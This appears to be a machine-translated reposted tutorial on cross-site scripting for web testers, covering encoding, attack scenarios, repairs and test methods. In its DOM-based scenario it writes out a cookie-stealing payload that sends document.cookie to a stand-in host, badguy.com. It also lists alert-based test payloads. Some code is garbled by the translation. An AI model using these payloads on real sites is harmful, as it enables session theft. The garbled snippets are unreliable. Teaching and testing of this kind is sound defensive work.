XSS-Cross-Site Scripting

XSS for Web Security Testing

Cross site scripting (XSS) is the most common vulnerability in Web applications. An attacker embeds a client script (such as JavaScript) in a webpage. When a user browses the webpage, the script is executed in the browser of the user to achieve the target of the attacker. for example, attackers can obtain users' cookies, navigate to malicious websites, and carry Trojans.

As a tester, you need to understand the XSS principles, attack scenarios, and how to fix them. In order to effectively prevent the occurrence of XSS.

 

Reading directory

1. How does XSS occur?
2. HTML encode
3. XSS attack scenarios
4. XSS vulnerability repair
5. How to test XSS vulnerabilities
6. Differences between HTML encode and URL encode
7. XSS filter in browser
8. XSS security mechanism in ASP. NET

How does XSS happen?

Suppose there is a textbox below

<input type="text" name="address1" value="value1from">

Value1from is the input from the user. If the user does not enter value1from, but enters "/> <SCRIPT> alert (document. Cookie) </SCRIPT> <! -Then it will become

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- ">

The embedded Javascript code will be executed.

 

Or if the user inputs "onfocus =" alert (document. Cookie ),

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

When an event is triggered, the embedded Javascript code is executed.

The attack power depends on the script entered by the user.

 

Of course, the data submitted by the user can also be sent to the server through querystring (in the URL) and cookie. For example

 

HTML encode

XSS occurs because the data entered by the user is changed to code. Therefore, we need to perform HTML encode processing on user input data. Encode special characters such as "brackets", "single quotes", and "quotation marks.

A ready-made method is provided in C #. You only need to call httputility. htmlencode ("string <scrui>. (System. Web Assembly needs to be referenced)

Fiddler also provides a convenient tool. Click "textwizard" on the toolbar.

 

XSS attack scenarios

1. Dom-based XSS vulnerability Attack Process:

Tom found a page in victim.com with an XSS vulnerability,

Example: http://victim.com/search.asp? Term = Apple

The code for the search. ASP page on the server is as follows:

Tom first sets up a website http://badguy.com to receive "stolen" information.
Then Tom constructs a malicious URL (as shown below) and sends it to Monica through some method (email, QQ ).
http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
Monica clicks this URL. The malicious JavaScript code embedded in the URL will be executed in Monica's browser. Then, the cookie of Monica on the victim.com website will be sent to the badguy website. In this way, the information of Monica in victim.com is stolen by Tom.
 
2. stored XSS (storage-type XSS vulnerability) is a vulnerability that is widely used and may affect the security of web servers. Attackers can upload attack scripts to Web servers, this makes information leakage possible for all users accessing this page. The attack process is as follows:
Alex discovered an XSS vulnerability on website a, which allows the attacker to store the attack code in the database,
Alex published an article that embedded malicious JavaScript code.
When other people access this article, such as Monica, the malicious JavaScript code embedded in the article will be executed in her browser, and her session cookie or other information will be stolen by Alex.
 
Dom-based XSS vulnerabilities threaten individual users, while stored XSS vulnerabilities threaten a large number of users.
 
XSS vulnerability repair
Principle: Do not trust customer input data
Note: the attack code is not necessarily in <SCRIPT> </SCRIPT>.

 

 
  
Mark important cookies as HTTP only, so that the document. Cookie statement in Javascript cannot get cookies.
 
  
Only allow users to enter the expected data. For example, in textbox of age, only users can enter numbers. Characters other than numbers are filtered out.
 
  
HTML encode processing of data
 
  
Filter or remove Special HTML tags, such as <SCRIPT>, <IFRAME>, & lt; For <, & gt; For>, & quot
 
  
Filter tags of JavaScript events. For example, "onclick =", "onfocus", etc.

 
How to test XSS vulnerabilities
Method 1: view the code and find the key variables. The client sends data to the Web server in three ways: querystring, form, and cookie. for example, in an ASP program, obtain the client variables through the request object.
<%strUserCode =  Request.QueryString(“code”);strUser =  Request.Form(“USER”);strID =    Request.Cookies(“ID”);%>
If the variable has not been htmlencode processed, this variable has an XSS vulnerability.
 
Method 2: Prepare the test script,
"/><script>alert(document.cookie)</script><!--<script>alert(document.cookie)</script><!--"onclick="alert(document.cookie)
Enter these test scripts in textbox or other fields on the webpage to check whether a dialog box is displayed. If yes, the XSS vulnerability exists.
Check the variables in the URL to pass the values to the Web server through the URL, and convert the values of these variables to our test script. Then check whether our script can be executed.
 
Method 3: Automated XSS Vulnerability Testing
There are already many XSS scanning tools. It is very simple to implement XSS automated testing. You only need to use the httpwebrequest class. Include the XSS test script. Send to the web server. Then, check whether our XSS test script has been injected into httpwebresponse.
Differences between HTML encode and URL encode
At the beginning, I always confused these two things. In fact, they are two different things.
As mentioned earlier in HTML encoding, URL encoding is used to comply with URL specifications. Because many characters in the standard URL specification are not allowed to appear in the URL.
For example, search for "test Chinese characters" in Baidu ". The URL is changed
Http://www.baidu.com? WD = % B2 % E2 % Ca % D4 % Ba % D7 % D6 & rsv_bp = 0 & rsv_spt = 3 & inputt = 7477
 
The so-called URL encoding means that all non-alphanumeric characters will be replaced with a semicolon (%) followed by two hexadecimal numbers, and spaces will be encoded as the plus sign (+)
 
A ready-made method is provided in C #. You only need to call httputility. urlencode ("string <scrui>. (System. Web Assembly needs to be referenced)
Fiddler also provides a convenient tool. Click "textwizard" on the toolbar.
XSS filter in browser
To prevent XSS attacks, many browser vendors add security mechanisms to their browsers to filter XSS. For example, IE8, ie9, Firefox, and chrome all have security mechanisms for XSS. The browser blocks XSS. For example

 
If you need to perform a test, you 'd better use IE7.
XSS security mechanism in ASP. NET
ASP. NET has a mechanism to prevent XSS. The submitted form will automatically check whether XSS exists. When a user tries to input XSS code, ASP. NET will throw an error, as shown in

Many programmers have no idea about security, and even do not know the existence of XSS. ASP. NET provides default security. In this way, even a programmer without security awareness can write a "safer Website".
To disable this security feature, use <% @ page validaterequest = "false" %>

Reprinted: http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html